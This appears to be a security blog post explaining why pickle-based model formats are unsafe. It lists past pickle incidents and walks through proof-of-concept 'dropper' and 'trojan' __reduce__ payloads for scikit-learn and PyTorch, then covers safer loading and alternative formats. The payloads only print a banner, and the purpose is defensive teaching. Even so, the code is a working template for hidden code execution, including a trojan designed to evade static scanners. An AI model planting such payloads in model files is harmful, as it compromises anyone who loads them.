Why Pickle Is an Unsafe Model-Storing Format
Let's begin by the first and most important message you should retain from this blog post:
never load a pickle file from an unknown source in memory!
This is also highlighted in the python documentation about pickle that you can find here.
Pickle files, and all the files that use pickle under the hood are actually unsafe (think .pt, .joblib, etc.) for a simple reason: the __reduce__ method can be exploited to inject malicious code.
In the next blog post I will show in detail how you can serialize your models in a much more secure way!
Spoiler: one of my favorite way of serializing machine learning model is ONNX because of the simplicity to run your model in any other language that has an onnxruntime implementation!
Why __reduce__ can be exploited
When you call pickle.dump(obj), Python looks for these methods in order:
__reduce_ex__(protocol) - Extended version with protocol support__reduce__- Standard reduction method__getstate__+__setstate__- State-based serialization- Default pickling - If none of the above exist, pickle the object's
__dict__
__reduce__ is designed to tell pickle "how to reconstruct this object". It can either return a minimal form (callable, args) or a full form (callable, args, state, listitems, dictitems).callable is a function to call and is the exploit entry point. args are the arguments we pass to that callable and the remaining parameters are optional.
The vulnerability is that pickle will call any callable you specify. It can be a exec command to execute arbitrary Python code, os.system to run shell command or subprocess.Popen to spawn processes.
In this article we will show two ways this can be exploited: a dropper and a trojan approach. The dropper approach directly calls the function specified as callable (to install another program for example) while the trojan approach is a bit more pernicious and replace the reconstructed object, showing its malicious behavior latter on.
As usual you can find the code in this repo to follow along!
Real-World Pickle Exploits
You might wonder "why bother with this?" Well... Pickle vulnerabilities aren't just theoretical... They've been exploited in production systems.
I’ve put together a brief overview of major security incidents caused by pickle over the past years:
CVE-2024-50050: Meta's Llama Stack
- Discovered by Oligo Security in September 2024
- Allowed remote code execution on llama-stack inference servers
- The root cause is the use of pickle for socket communication through pyzmq's
recv_pyobj()method - Was fixed in Version 0.0.41+ by replacing pickle by type-safe Pydantic json
Sleepy Pickle Attack
- Developed by Trail of Bits (they have their own blogpost about pickle!, take a look)
- Injects malicious payloads into pickle files that modify ML model behavior dynamically
- Can target machine learning models on platforms like Hugging Face
- Leaves no disk trace; poisoning occurs only during deserialization
- In February 2025, researchers found malicious models using "broken" pickle files to bypass Picklescan safeguards
Hugging Face Incidents
- Multiple malicious ML models discovered exploiting pickle files in 2024 and 2025
- Models linking to web shells and phishing sites
- Attackers upload models with backdoored pickle files disguised as legitimate models
Other Notable Vulnerabilities
- MLflow:
_load_model_from_local_filemethod used pickle internally, enabling code execution - ClearML: Pre-1.14.2 versions vulnerable to malicious pickle artifacts
- CVE-2025-1716: Bypass of picklescan static analysis tool, allowing arbitrary code execution
I hope these examples convince you that using pickle for model serialization is... a bad idea.
Real-World Impact: Scikit-learn and PyTorch
Before diving into the exploits, it’s worth noting that many popular Python and ML libraries use pickle under the hood. Scikit-learn and PyTorch are the most well-known, but plenty of other frameworks inherit the same vulnerability. You really have to stay paranoid and ask yourself, every time you serialize something in Python, “Is this using pickle under the hood?”
In the next parts we'll demonstrate exploits using both scikit-learn (.pkl files) and PyTorch (.pth files) to show how widespread this issue is.
Dropper
First example is a dropper. It means that it is triggered when we load the pickle file in memory
# post_2/train_iris.py
class MaliciousLoaderTransformer:
def __init__(self):
pass
def __reduce__(self) -> tuple:
import os # noqa
code = """
import os
print("=" * 50)
print("SCIKIT-LEARN DROPPER: Pwned during load!!")
print(f"Process ID: {os.getpid()}")
print("=" * 50)
"""
return (exec, (code,))
def __str__(self):
return "A very safe transformer"
def fit(self, x, y):
pass
def transform(self, x):
return x
def fit_transform(self, x, y=None):
self.fit(x, y)
return self.transform(x)
Here's what happens when you load the .pkl file:
pickle.load("model.pkl") -> Find __reduce__ method -> Extract (callable, args) -> Execute: exec(malicious_code) ! -> Model loaded (but you've been pwned...)
# post_2/predict_iris.py
# ...
def load_model(model_name: str):
logger.info("Loading model")
with open(f"{model_name}.pickle", "rb") as handle:
model = pickle.load(handle)
logger.info("Returning model")
return model
# ...
if __name__ == "__main__":
x, _ = load_dataframe()
# Dropper/Load approach
model = load_model("very_safe_model")
y_predict = make_prediction(model, x)
print(y_predict)
This is the output you get, as you can see a process has spawned right after the model loading:
2025-11-15 09:48:44.501 | INFO | __main__:load_model:10 - Loading model
==================================================
SCIKIT-LEARN DROPPER: Pwned during load!!
Process ID: 12020
==================================================
2025-11-15 09:48:44.531 | INFO | __main__:load_model:13 - Returning model
2025-11-15 09:48:44.531 | INFO | __main__:make_prediction:18 - Inferring
2025-11-15 09:48:44.532 | INFO | __main__:make_prediction:20 - Inferring done
[0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2]
Trojan
The trojan approach is more sophisticated and stealthier than the dropper. Instead of executing malicious code immediately during load, it reconstructs the object with injected malicious methods that execute later during normal usage (like calling transform()). This makes it harder to detect because the file loads without any obvious malicious behavior. Some static analysis tools might even miss the payload hidden in the nested exec/eval. Also the malicious code only triggers during prediction, when users would expect the model to be working "normally"...
# post_2/train_iris.py
class MaliciousTrojanTransformer:
def __init__(self):
pass
def __str__(self):
return "Another very safe transformer"
def fit(self, x, y):
pass
def transform(self, x):
return x
def fit_transform(self, x, y=None):
self.fit(x, y)
return self.transform(x)
def __reduce__(self) -> tuple:
# Use eval to create a simple object with malicious methods using exec
payload = """(lambda: (
exec('''
import os
def malicious_transform(self, x):
print("=" * 50)
print("SCIKIT-LEARN TROJAN: Pwned during prediction!!")
print(f"Process ID: {os.getpid()}")
print("=" * 50)
return x
def fit(self, x, y=None):
return self
def fit_transform(self, x, y=None):
return self.transform(x)
class TrojanTransformer:
transform = malicious_transform
fit = fit
fit_transform = fit_transform
''', globals()),
globals()['TrojanTransformer']()
)[-1])()"""
return (eval, (payload,))
# post_2/predict_iris.py
if __name__ == "__main__":
x, _ = load_dataframe()
# Trojan approach
model = load_model("another_very_safe_model")
y_predict = make_prediction(model, x)
print(y_predict)
The original MaliciousTrojanTransformer object is never actually reconstructed. It is replaced by the instance of the new, hidden TrojanTransformer.
The output you get:
2025-11-15 09:48:44.532 | INFO | __main__:load_model:10 - Loading model
2025-11-15 09:48:44.533 | INFO | __main__:load_model:13 - Returning model
2025-11-15 09:48:44.533 | INFO | __main__:make_prediction:18 - Inferring
==================================================
SCIKIT-LEARN TROJAN: Pwned during prediction!!
Process ID: 12020
==================================================
2025-11-15 09:48:44.534 | INFO | __main__:make_prediction:20 - Inferring done
[0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 2
2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2
2 2]
PyTorch Examples
The same exploits work with PyTorch models when using prior 2.6 versions or disabling the weight_only parameter in the load function.
Here's the dropper approach adapted for PyTorch:
PyTorch Dropper
# post_2/train_mnist.py
import torch
import torch.nn as nn
class SimpleMNISTNet(nn.Module):
def __init__(self):
super(SimpleMNISTNet, self).__init__()
self.flatten = nn.Flatten()
self.fc1 = nn.Linear(28 * 28, 128)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
x = self.flatten(x)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
class MaliciousDropperNet(nn.Module):
def __init__(self):
super(MaliciousDropperNet, self).__init__()
# Same architecture as SimpleMNISTNet
self.flatten = nn.Flatten()
self.fc1 = nn.Linear(28 * 28, 128)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(128, 10)
def __reduce__(self) -> tuple:
code = """
import os
print("=" * 50)
print("PYTORCH DROPPER: Pwned during load!!")
print(f"Process ID: {os.getpid()}")
print("=" * 50)
"""
return (exec, (code,))
def forward(self, x):
x = self.flatten(x)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
# Train model and create malicious version
model = SimpleMNISTNet()
# ... training code ...
torch.save(model, "safe_model.pth")
malicious = MaliciousDropperNet()
malicious.load_state_dict(model.state_dict()) # Copy trained weights
torch.save(malicious, "malicious_model.pth")
When a victim loads this model (with PyTorch < 2.6 or weights_only=False):
# Victim's code - only has the innocent SimpleMNISTNet class definition
model = torch.load("malicious_model.pth") # Exploit triggers here!
Output:
==================================================
PYTORCH DROPPER: Pwned during load!!
Process ID: 13600
==================================================
PyTorch Trojan
The trojan approach injects malicious code into the forward pass:
class MaliciousTrojanNet(nn.Module):
def __init__(self):
super(MaliciousTrojanNet, self).__init__()
self.flatten = nn.Flatten()
self.fc1 = nn.Linear(28 * 28, 128)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(128, 10)
def __reduce__(self) -> tuple:
payload = """(lambda: (
exec('''
import torch
import torch.nn as nn
import os
class TrojanNet(nn.Module):
def __init__(self):
super(TrojanNet, self).__init__()
self.flatten = nn.Flatten()
self.fc1 = nn.Linear(28 * 28, 128)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(128, 10)
def forward(self, x):
print("=" * 50)
print("PYTORCH TROJAN: Pwned during forward pass!!")
print(f"Process ID: {os.getpid()}")
print("=" * 50)
# Still perform the actual computation to avoid detection
x = self.flatten(x)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
''', globals()),
globals()['TrojanNet']()
)[-1])()"""
return (eval, (payload,))
def forward(self, x):
x = self.flatten(x)
x = self.fc1(x)
x = self.relu(x)
x = self.fc2(x)
return x
When the victim uses this model:
model = torch.load("trojan_model.pth") # Loads successfully
predictions = model(test_data) # Exploit triggers during inference!
Output:
==================================================
PYTORCH TROJAN: Pwned during forward pass!!
Process ID: 13600
==================================================
PyTorch Security Update (2025)
Starting with PyTorch 2.6.0 (released January 29, 2025), torch.load() now defaults to weights_only=True, which prevents the exploits shown above. This is a major security improvement!
Testing the exploits with PyTorch 2.6+
With weights_only=True, attempting to load malicious models will fail safely:
Traceback (most recent call last):
File "/home/jdelbar/Documents/projects/avoid-pickle/predict_pytorch.py", line 74, in <module>
model = load_model("mnist_safe_model")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/jdelbar/Documents/projects/avoid-pickle/predict_pytorch.py", line 28, in load_model
model = torch.load(f"{model_name}.pth")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/jdelbar/Documents/projects/avoid-pickle/.venv/lib/python3.12/site-packages/torch/serialization.py", line 1529, in load
raise pickle.UnpicklingError(_get_wo_message(str(e))) from None
_pickle.UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, do those steps only if you trust the source of the checkpoint.
(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
WeightsUnpickler error: Unsupported global: GLOBAL __main__.SimpleMNISTNet was not an allowed global by default. Please use `torch.serialization.add_safe_globals([__main__.SimpleMNISTNet])` or the `torch.serialization.safe_globals([__main__.SimpleMNISTNet])` context manager to allowlist this global if you trust this class/function.
Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.
Best Practices for PyTorch Models
- Upgrade to PyTorch 2.6+ to get safe defaults
- For PyTorch < 2.6: Always use
weights_only=Truewhen loading from untrusted sources - Preferred approach: Save only state_dict, not full models:
# Save torch.save(model.state_dict(), "model_weights.pth") # Load model = MyModel() # Instantiate model first model.load_state_dict(torch.load("model_weights.pth", weights_only=True))
What are the alternatives?
There are two much better options than pickle-based formats for saving ML models. Both avoid arbitrary code execution and come with extra benefits depending on your workflow:
- safetensors: a secure tensor storage format with fast memory-mapped loading. Perfect for sharing checkpoints or loading models in production with strong safety guarantees.
- ONNX: a framework-agnostic model graph format designed for portable and optimized inference across many runtimes (ONNX Runtime, TensorRT, OpenVINO, etc.). Great when you need speed, portability, or to decouple training from serving.
In my next blog post I will show how to serialize your model with ONNX and a second part will show how you can serve that ONNX model in Rust using the ort library!